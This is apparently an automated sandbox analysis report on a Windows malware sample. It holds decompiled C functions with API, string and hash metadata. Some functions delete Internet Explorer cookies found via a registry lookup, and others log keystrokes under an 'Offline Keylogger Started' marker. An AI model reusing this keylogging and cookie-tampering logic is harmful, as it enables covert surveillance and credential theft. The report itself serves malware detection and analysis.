                              0x00000000
                              0x0043d27e
                              0x0043d27e
                              0x0043d281
                              0x0043d287
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d287
                              0x0043d27c
                              0x0043d292
                              0x0043d297
                              0x0043d299
                              0x0043d29e
                              0x0043d2a1
                              0x0043d2a4
                              0x0043d2a7
                              0x0043d2aa
                              0x0043d2ac
                              0x0043d2b1
                              0x0043d2bb
                              0x0043d2c3
                              0x0043d2cb
                              0x00000000
                              0x0043d2d1
                              0x0043d2d5
                              0x0043d322
                              0x0043d328
                              0x0043d32b
                              0x0043d32e
                              0x0043d330
                              0x0043d334
                              0x0043d338
                              0x0043d33a
                              0x0043d33d
                              0x0043d342
                              0x0043d338
                              0x0043d343
                              0x0043d346
                              0x0043d348
                              0x0043d34a
                              0x0043d34e
                              0x0043d34f
                              0x0043d351
                              0x0043d354
                              0x0043d359
                              0x0043d34f
                              0x0043d35c
                              0x0043d35f
                              0x0043d362
                              0x0043d365
                              0x0043d368
                              0x0043d368
                              0x0043d2d7
                              0x0043d2d7
                              0x0043d2da
                              0x0043d2dd
                              0x0043d2df
                              0x0043d2e3
                              0x0043d2e7
                              0x0043d2e9
                              0x0043d2ec
                              0x0043d2f1
                              0x0043d2e7
                              0x0043d2f2
                              0x0043d2f7
                              0x0043d2f9
                              0x0043d2fe
                              0x0043d300
                              0x0043d303
                              0x0043d308
                              0x0043d2fe
                              0x0043d309
                              0x0043d30d
                              0x0043d30d
                              0x0043d310
                              0x0043d314
                              0x0043d317
                              0x0043d317
                              0x00000000
                              0x0043d31a
                              0x00000000
                              0x0043d2cb
                              0x0043d28d
                              0x0043d28f
                              0x0043d28f
                              0x00000000
                              0x0043d28f
                              0x0043d36f
                              0x0043d370
                              0x0043d371
                              0x0043d372
                              0x0043d373
                              0x0043d374
                              0x0043d379
                              0x0043d37c
                              0x0043d37d
                              0x0043d37f
                              0x0043d385
                              0x0043d38c
                              0x0043d38f
                              0x0043d392
                              0x0043d393
                              0x0043d394
                              0x0043d397
                              0x0043d398
                              0x0043d39b
                              0x0043d3a1
                              0x0043d3a3
                              0x0043d3c8
                              0x0043d3d2
                              0x0043d3d8
                              0x0043d3da
                              0x0043d3e0
                              0x0043d3e2
                              0x0043d635
                              0x0043d636
                              0x00000000
                              0x0043d3e8
                              0x0043d3e8
                              0x0043d3ec
                              0x0043d553
                              0x0043d553
                              0x0043d56a
                              0x0043d56f
                              0x0043d572
                              0x0043d574
                              0x0043d57a
                              0x0043d57a
                              0x0043d57c
                              0x0043d57c
                              0x0043d57f
                              0x0043d581
                              0x0043d587
                              0x0043d587
                              0x0043d589
                              0x0043d610
                              0x0043d610
                              0x0043d58f
                              0x0043d58f
                              0x0043d591
                              0x0043d597
                              0x0043d59a
                              0x0043d59d
                              0x0043d5a3
                              0x00000000
                              0x00000000
                              0x0043d5a5
                              0x0043d5a9
                              0x0043d5d2
                              0x0043d5d2
                              0x0043d5d4
                              0x0043d5ab
                              0x0043d5ab
                              0x0043d5af
                              0x0043d5b3
                              0x0043d5ba
                              0x0043d5c0
                              0x00000000
                              0x0043d5c2
                              0x0043d5c2
                              0x0043d5c5
                              0x0043d5c8
                              0x0043d5d0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d5d0
                              0x0043d5c0
                              0x0043d5df
                              0x0043d5df
                              0x0043d5e1
                              0x0043d60f
                              0x0043d60f
                              0x00000000
                              0x0043d5e3
                              0x0043d5e3
                              0x0043d5e9
                              0x0043d5ea
                              0x0043d5eb
                              0x0043d5ec
                              0x0043d5f1
                              0x0043d5f7
                              0x0043d5fa
                              0x0043d5fc
                              0x0043d603
                              0x0043d605
                              0x0043d607
                              0x0043d5fe
                              0x0043d5fe
                              0x0043d5ff
                              0x00000000
                              0x0043d5ff
                              0x0043d5fc
                              0x00000000
                              0x0043d5e1
                              0x0043d5d8
                              0x0043d5da
                              0x0043d5dd
                              0x0043d5dd
                              0x00000000
                              0x0043d5dd
                              0x0043d616
                              0x0043d616
                              0x0043d617
                              0x0043d61a
                              0x0043d620
                              0x0043d620
                              0x0043d629
                              0x0043d62b
                              0x00000000
                              0x0043d62d
                              0x0043d62d
                              0x00000000
                              0x0043d62d
                              0x0043d62b
                              0x00000000
                              0x0043d3f2
                              0x0043d3f2
                              0x0043d3f7
                              0x00000000
                              0x0043d3fd
                              0x0043d3fd
                              0x0043d402
                              0x00000000
                              0x0043d408
                              0x0043d408
                              0x0043d40e
                              0x0043d413
                              0x0043d415
                              0x0043d41c
                              0x0043d41d
                              0x0043d41f
                              0x00000000
                              0x00000000
                              0x0043d425
                              0x0043d425
                              0x0043d429
                              0x0043d42f
                              0x00000000
                              0x0043d435
                              0x0043d437
                              0x0043d438
                              0x0043d43b
                              0x00000000
                              0x0043d441
                              0x0043d441
                              0x0043d447
                              0x0043d44c
                              0x0043d456
                              0x0043d45a
                              0x0043d45f
                              0x0043d462
                              0x0043d464
                              0x00000000
                              0x0043d466
                              0x0043d466
                              0x0043d468
                              0x0043d46b
                              0x0043d46b
                              0x0043d46e
                              0x0043d471
                              0x0043d471
                              0x0043d47c
                              0x0043d47e
                              0x0043d480
                              0x00000000
                              0x00000000
                              0x0043d480
                              0x00000000
                              0x0043d482
                              0x0043d482
                              0x0043d488
                              0x0043d48b
                              0x0043d48b
                              0x0043d499
                              0x0043d4a2
                              0x0043d4a7
                              0x0043d4ad
                              0x0043d4b0
                              0x0043d4b1
                              0x0043d4b3
                              0x0043d4c1
                              0x0043d4c1
                              0x0043d4c8
                              0x0043d529
                              0x00000000
                              0x0043d4ca
                              0x0043d4ca
                              0x0043d4d8
                              0x0043d4dd
                              0x0043d4e0
                              0x0043d4e2
                              0x0043d652
                              0x0043d654
                              0x0043d655
                              0x0043d656
                              0x0043d657
                              0x0043d658
                              0x0043d659
                              0x0043d65e
                              0x0043d661
                              0x0043d662
                              0x0043d66a
                              0x0043d671
                              0x0043d674
                              0x0043d675
                              0x0043d678
                              0x0043d67c
                              0x0043d67d
                              0x0043d680
                              0x0043d690
                              0x0043d69c
                              0x0043d6b3
                              0x0043d6b8
                              0x0043d6bb
                              0x0043d6bd
                              0x0043d6d2
                              0x0043d6d5
                              0x0043d6d5
                              0x0043d6d8
                              0x0043d6de
                              0x0043d6e7
                              0x0043d6e9
                              0x0043d6ec
                              0x0043d6f3
                              0x0043d6f6
                              0x0043d6fc
                              0x00000000
                              0x00000000
                              0x0043d6fe
                              0x0043d702
                              0x0043d72b
                              0x0043d72b
                              0x0043d704
                              0x0043d704
                              0x0043d708
                              0x0043d70c
                              0x0043d713
                              0x0043d719
                              0x00000000
                              0x0043d71b
                              0x0043d71b
                              0x0043d71e
                              0x0043d721
                              0x0043d729
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d729
                              0x0043d719
                              0x0043d738
                              0x0043d738
                              0x0043d73a
                              0x0043d740
                              0x0043d746
                              0x0043d749
                              0x0043d749
                              0x0043d74c
                              0x0043d74f
                              0x0043d74f
                              0x0043d75f
                              0x0043d76d
                              0x0043d772
                              0x0043d779
                              0x0043d77b
                              0x00000000
                              0x0043d781
                              0x0043d787
                              0x0043d78d
                              0x0043d794
                              0x0043d79a
                              0x0043d79d
                              0x0043d7a3
                              0x0043d7b0
                              0x0043d7b7
                              0x0043d7bc
                              0x0043d7bf
                              0x0043d7c1
                              0x0043da1a
                              0x0043da20
                              0x0043da21
                              0x0043da22
                              0x0043da23
                              0x0043da24
                              0x0043da25
                              0x0043da2a
                              0x0043da30
                              0x0043d7c7
                              0x0043d7c7
                              0x0043d7d5
                              0x0043d7d8
                              0x0043d7f3
                              0x0043d7fa
                              0x0043d800
                              0x0043d806
                              0x0043d7da
                              0x0043d7da
                              0x0043d7e2
                              0x00000000
                              0x0043d7e4
                              0x0043d7e4
                              0x0043d7ea
                              0x0043d7ea
                              0x0043d7e2
                              0x0043d80d
                              0x0043d810
                              0x0043d92d
                              0x0043d930
                              0x0043d93d
                              0x0043d940
                              0x0043d948
                              0x0043d948
                              0x0043d932
                              0x0043d938
                              0x0043d938
                              0x0043d816
                              0x0043d816
                              0x0043d81c
                              0x0043d824
                              0x0043d826
                              0x0043d829
                              0x0043d832
                              0x0043d83b
                              0x0043d841
                              0x0043d841
                              0x0043d844
                              0x0043d846
                              0x00000000
                              0x00000000
                              0x0043d848
                              0x0043d84e
                              0x0043d84f
                              0x0043d85a
                              0x0043d862
                              0x0043d86a
                              0x0043d86d
                              0x0043d870
                              0x0043d876
                              0x0043d87c
                              0x0043d882
                              0x0043d888
                              0x0043d88b
                              0x00000000
                              0x00000000
                              0x0043d88d
                              0x0043d8b2
                              0x0043d8b2
                              0x0043d8b5
                              0x0043d8b9
                              0x0043d8d2
                              0x0043d8d7
                              0x0043d8da
                              0x0043d8dc
                              0x0043d8e2
                              0x0043d91d
                              0x0043d8e4
                              0x0043d8e4
                              0x0043d8e9
                              0x0043d8f1
                              0x0043d8f2
                              0x0043d8f2
                              0x0043d909
                              0x0043d910
                              0x0043d913
                              0x0043d918
                              0x0043d918
                              0x0043d920
                              0x0043d923
                              0x0043d923
                              0x0043d928
                              0x00000000
                              0x0043d928
                              0x0043d88f
                              0x0043d891
                              0x0043d896
                              0x0043d89c
                              0x0043d8a5
                              0x0043d8ae
                              0x0043d8ae
                              0x00000000
                              0x0043d891
                              0x0043d94b
                              0x0043d94b
                              0x0043d94f
                              0x0043d957
                              0x0043d95d
                              0x0043d960
                              0x0043d966
                              0x0043d968
                              0x0043d9a8
                              0x0043d9ae
                              0x0043d9b5
                              0x0043d9b5
                              0x0043d9bb
                              0x0043d9bf
                              0x00000000
                              0x0043d9c1
                              0x0043d9c1
                              0x0043d9c5
                              0x0043d9ca
                              0x0043d9ce
                              0x0043d9d3
                              0x0043d9da
                              0x0043d9e8
                              0x0043d9ee
                              0x0043d9f1
                              0x0043d9f1
                              0x0043d9bf
                              0x0043da00
                              0x0043da08
                              0x0043da11
                              0x0043d96a
                              0x0043d970
                              0x0043d973
                              0x0043d97a
                              0x0043d98c
                              0x0043d993
                              0x0043d9a0
                              0x00000000
                              0x0043d9a0
                              0x00000000
                              0x0043d968
                              0x0043d7c1
                              0x0043d73c
                              0x00000000
                              0x0043d73c
                              0x00000000
                              0x0043d73a
                              0x0043d733
                              0x0043d735
                              0x0043d735
                              0x00000000
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6c1
                              0x0043d6c6
                              0x0043d6d1
                              0x0043d6d1
                              0x0043d4e8
                              0x0043d4e8
                              0x0043d4eb
                              0x0043d4f0
                              0x0043d64d
                              0x00000000
                              0x0043d4f6
                              0x0043d4f8
                              0x0043d500
                              0x0043d506
                              0x0043d507
                              0x0043d50d
                              0x0043d50e
                              0x0043d513
                              0x0043d516
                              0x0043d518
                              0x0043d51e
                              0x0043d520
                              0x0043d521
                              0x0043d521
                              0x0043d52f
                              0x0043d52f
                              0x0043d532
                              0x0043d534
                              0x0043d537
                              0x0043d545
                              0x0043d545
                              0x0043d62f
                              0x0043d62f
                              0x00000000
                              0x0043d631
                              0x0043d631
                              0x00000000
                              0x0043d539
                              0x0043d539
                              0x0043d53c
                              0x0043d53f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d53f
                              0x0043d537
                              0x0043d4f0
                              0x0043d4e2
                              0x0043d4b5
                              0x0043d4b7
                              0x0043d4b8
                              0x0043d4bb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d4bb
                              0x0043d4b3
                              0x0043d43b
                              0x00000000
                              0x0043d42f
                              0x00000000
                              0x0043d54c
                              0x0043d402
                              0x0043d3f7
                              0x0043d3ec
                              0x0043d3a5
                              0x0043d3a5
                              0x0043d3a7
                              0x0043d3a9
                              0x0043d3aa
                              0x0043d3ab
                              0x0043d3ac
                              0x0043d3b1
                              0x0043d63c
                              0x0043d641
                              0x0043d64c
                              0x0043d64c
                              0x0043d3a3
                              0x00000000

                              APIs
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F
                              • _free.LIBCMT ref: 0043D2EC
                              • _free.LIBCMT ref: 0043D303
                              • _free.LIBCMT ref: 0043D322
                              • _free.LIBCMT ref: 0043D33D
                              • _free.LIBCMT ref: 0043D354
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$AllocHeap
                              • String ID: sE
                              • API String ID: 1835388192-3868527542
                              • Opcode ID: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
                              • Instruction ID: af8df24ae55f722775fb3ee277683ae55e0fcf911b6e467c94d3c9977f85d582
                              • Opcode Fuzzy Hash: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
                              • Instruction Fuzzy Hash: FD51E371E002049FDB209F6AE842A6B77F4EF5C724F1416AEE809D7250E739ED01CB49
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A7A6, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E0040A7A6(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E004020B5(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E004102D2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				L00401FB1( &_v28, 0x80000001, _t59, _t17);
				L00401FA7();
				_t58 = 0x45f6ac;
				_t20 = L00405A22(0x45f6ac);
				_t66 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(L00401F75( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402064(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = E004170AC(L00401ECB(L00416C32( &_v76,  &_v52)));
						L00401ED0();
						_t55 =  &_v52;
						L00401FA7();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = L0040AAB0();
							if(__eflags != 0) {
								_t41 = 1;
								E00402064(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								L0040AA8C(1,  &_v52, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402064(_t41, _t48);
					L0040AA8C(_t41, _t58, _t66);
					_t41 = 1;
					L8:
				}
				L00401FA7();
				return _t41;
			}





















                              0x0040a7af
                              0x0040a7b4
                              0x0040a7b9
                              0x0040a7cc
                              0x0040a7ce
                              0x0040a7d3
                              0x0040a7da
                              0x0040a7e2
                              0x0040a7e7
                              0x0040a7ef
                              0x0040a7f4
                              0x0040a7f6
                              0x0040a828
                              0x0040a83b
                              0x0040a83d
                              0x00000000
                              0x0040a83f
                              0x0040a849
                              0x0040a84e
                              0x0040a862
                              0x0040a86c
                              0x0040a871
                              0x0040a874
                              0x0040a879
                              0x0040a87b
                              0x0040a88c
                              0x0040a88d
                              0x0040a893
                              0x0040a895
                              0x0040a89a
                              0x0040a8a3
                              0x0040a8a8
                              0x00000000
                              0x0040a8a8
                              0x0040a87d
                              0x0040a880
                              0x0040a882
                              0x00000000
                              0x0040a882
                              0x0040a87b
                              0x0040a7f8
                              0x0040a7f8
                              0x0040a7fb
                              0x0040a7fd
                              0x0040a802
                              0x0040a802
                              0x0040a807
                              0x0040a80c
                              0x0040a8ad
                              0x0040a8ad
                              0x0040a8b3
                              0x0040a8bf

                              APIs
                                • Part of subcall function 004102D2: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 004102F4
                                • Part of subcall function 004102D2: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00410313
                                • Part of subcall function 004102D2: RegCloseKey.ADVAPI32(?), ref: 0041031C
                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A828
                              • PathFileExistsA.SHLWAPI(?), ref: 0040A835
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                              • API String ID: 1133728706-4073444585
                              • Opcode ID: d54a227835b152a1126f4ffcf77cef355c2697ac5d810812eca284e3e5a89111
                              • Instruction ID: 86840d2655219e895a2e3310a5aa52ddb93a2453b48acae1739db4ed104c70da
                              • Opcode Fuzzy Hash: d54a227835b152a1126f4ffcf77cef355c2697ac5d810812eca284e3e5a89111
                              • Instruction Fuzzy Hash: 8621BF31A102055ACB18B7B1CC5BDEE77689F15304F80013FB901B71D2EA7C9A5ACA9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044FA43, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                              Download Yara Rule
                              C-Code - Quality: 90%
                              			E0044FA43(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						L00440D5D(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E0043E61D(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									L00439DDE(GetLastError());
								}
							}
							L0043EE85(_t40);
							_t14 = _t35;
						} else {
							L00439DDE(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(L00439E14())) = 0x16;
						E0043626D();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(L00439E14())) = 0x16;
				E0043626D();
				return 0;
			}
















                              0x0044fa48
                              0x0044fa4d
                              0x0044fa67
                              0x0044fa6a
                              0x0044fa6c
                              0x0044fa85
                              0x0044fa87
                              0x0044fa8e
                              0x0044fa90
                              0x0044fa99
                              0x0044fa9a
                              0x0044fa9e
                              0x0044faa4
                              0x0044faa7
                              0x0044faa9
                              0x0044fac3
                              0x0044fac6
                              0x0044fac8
                              0x0044fad5
                              0x0044fadb
                              0x0044fadd
                              0x0044faf1
                              0x0044faf3
                              0x0044faf7
                              0x0044faf7
                              0x0044faf8
                              0x0044fadf
                              0x0044fae6
                              0x0044faeb
                              0x0044fadd
                              0x0044fafb
                              0x0044fb00
                              0x0044faab
                              0x0044fab2
                              0x0044fab7
                              0x0044fab7
                              0x0044fa6e
                              0x0044fa73
                              0x0044fa79
                              0x0044fa7e
                              0x0044fa7e
                              0x00000000
                              0x0044fb05
                              0x0044fa54
                              0x0044fa5a
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aa8b7380e9e2fa54c836bb8ecbf4476d0dbd25c1ba35cd8a11bb044368231e8e
                              • Instruction ID: a1c109c1609699d4209c0352da68e76d0abf83c28ba15cddbfee87ef62dca71a
                              • Opcode Fuzzy Hash: aa8b7380e9e2fa54c836bb8ecbf4476d0dbd25c1ba35cd8a11bb044368231e8e
                              • Instruction Fuzzy Hash: DE112472504215BFEB216FB28C0596B3A6CDF86761F11416AB829D7281DA78CD05C278
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00409636, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74timeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 63%
                              			E00409636(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				WCHAR* _t33;
				void* _t65;
				void* _t67;
				void* _t70;

				_t70 = __eflags;
				_t42 = __ebx;
				_t67 = __ecx;
				GetLocalTime( &_v20);
				L00401EDA( &_a4, _t26, _t67, E00403086(__ebx,  &_v44, L00409E6B( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
				L00401ED0();
				L00401ED0();
				_push(0x64 + E00402469() * 2);
				_t33 = L00438E06( &_a4);
				_t66 = _t33;
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				wsprintfW(_t33, L00401ECB( &_a4));
				if( *((char*)(_t67 + 0x49)) != 0) {
					_t19 = _t67 + 4; // 0x46c354
					E0040766E(__ebx, _t19, _t66, _t66);
				}
				if( *((char*)(_t67 + 0x4a)) != 0) {
					_t21 = _t67 + 0x1c; // 0x46c36c
					E0040766E(_t42, _t21, _t66, _t66);
					_t22 = _t67 + 0x3c; // 0x0
					SetEvent( *_t22);
				}
				L00438E01(_t66);
				return L00401ED0();
			}












                              0x00409636
                              0x00409636
                              0x00409641
                              0x00409644
                              0x00409670
                              0x00409678
                              0x00409680
                              0x00409694
                              0x00409695
                              0x0040969f
                              0x004096a5
                              0x004096aa
                              0x004096af
                              0x004096b4
                              0x004096b9
                              0x004096ba
                              0x004096c5
                              0x004096d2
                              0x004096d5
                              0x004096d8
                              0x004096d8
                              0x004096e1
                              0x004096e4
                              0x004096e7
                              0x004096ec
                              0x004096ef
                              0x004096ef
                              0x004096f6
                              0x00409709

                              APIs
                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                              • wsprintfW.USER32 ref: 004096C5
                              • SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: EventLocalTimechar_traitswsprintf
                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                              • API String ID: 3003339404-248792730
                              • Opcode ID: f0624f23261da35f477d53f9b92bf0e30819aa203d6935bf6dfc9d140d79229c
                              • Instruction ID: 6949cdf2dc2b1dc4c02aecbde94e80b0bd9bd0d89d133fd011f78c3c8f91f7cb
                              • Opcode Fuzzy Hash: f0624f23261da35f477d53f9b92bf0e30819aa203d6935bf6dfc9d140d79229c
                              • Instruction Fuzzy Hash: E921B376400118AAC728EB66DC558FF77B8AF08345F00013FF842621E2EF79AA45C7A9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00416871, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71sleeplibraryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 45%
                              			E00416871(void* __edx) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				intOrPtr* _t44;

				_t40 = __edx;
				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t44( &_v52,  &_v28,  &_v20);
				Sleep(0x3e8);
				 *_t44( &_v44,  &_v36,  &_v12);
				_t25 = E00416926( &_v12);
				_t26 = E00416926( &_v20);
				asm("sbb ebx, edx");
				_t27 = E00416926( &_v28);
				asm("sbb ebx, edx");
				_v8 = _t25 - _t26 - _t27 + E00416926( &_v36);
				asm("adc ebx, edx");
				_t29 = E00416926( &_v44);
				asm("sbb esi, edx");
				_t30 = E00416926( &_v52);
				asm("adc esi, edx");
				return E004500F0(E004500B0(_t25 - _t26 - _t27 + E00416926( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
			}

















                              0x00416871
                              0x00416891
                              0x0041689f
                              0x004168a6
                              0x004168b8
                              0x004168bd
                              0x004168c9
                              0x004168d3
                              0x004168d5
                              0x004168df
                              0x004168eb
                              0x004168ee
                              0x004168f0
                              0x004168fe
                              0x00416900
                              0x0041690b
                              0x00416925

                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F), ref: 00416884
                              • GetProcAddress.KERNEL32(00000000), ref: 0041688B
                              • Sleep.KERNEL32(000003E8,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F,00000095), ref: 004168A6
                              • __aulldiv.LIBCMT ref: 0041691A
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProcSleep__aulldiv
                              • String ID: GetSystemTimes$kernel32.dll
                              • API String ID: 482274533-1354958348
                              • Opcode ID: 447e08370cb846e82d1e918c8c685330979de9bb69d58332e4160e1d868d99db
                              • Instruction ID: 591b4d1d7c4e76c74ddada12000fb562f1f068179a7c55beccbbde0fa6e2f12d
                              • Opcode Fuzzy Hash: 447e08370cb846e82d1e918c8c685330979de9bb69d58332e4160e1d868d99db
                              • Instruction Fuzzy Hash: BF11A5B7D003286BC710EBF5DD85DEF7B7CAB44750F05062AF905A3545ED349A0486E4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004349C5, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E004349C5(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46a090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E004314E8(__eflags,  *0x46a090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00431522(__eflags,  *0x46a090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = L0043DFD9(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00431522(__eflags,  *0x46a090, 0);
								} else {
									__eflags = E00431522(__eflags,  *0x46a090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L0043EE85(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                              0x004349cc
                              0x004349df
                              0x004349e6
                              0x004349e9
                              0x004349ec
                              0x00434a05
                              0x00434a05
                              0x004349ee
                              0x004349ee
                              0x004349f0
                              0x004349fa
                              0x00434a00
                              0x00434a01
                              0x00434a03
                              0x00434a13
                              0x00434a17
                              0x00434a19
                              0x00434a2d
                              0x00434a2d
                              0x00434a36
                              0x00434a1b
                              0x00434a29
                              0x00434a2b
                              0x00434a3f
                              0x00434a41
                              0x00434a41
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434a2b
                              0x00434a44
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434a03
                              0x004349f0
                              0x00434a4c
                              0x00434a56
                              0x004349ce
                              0x004349d0
                              0x004349d0

                              APIs
                              • GetLastError.KERNEL32(?,?,004349BC,00431B02), ref: 004349D3
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004349E1
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004349FA
                              • SetLastError.KERNEL32(00000000,?,004349BC,00431B02), ref: 00434A4C
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ErrorLastValue___vcrt_
                              • String ID:
                              • API String ID: 3852720340-0
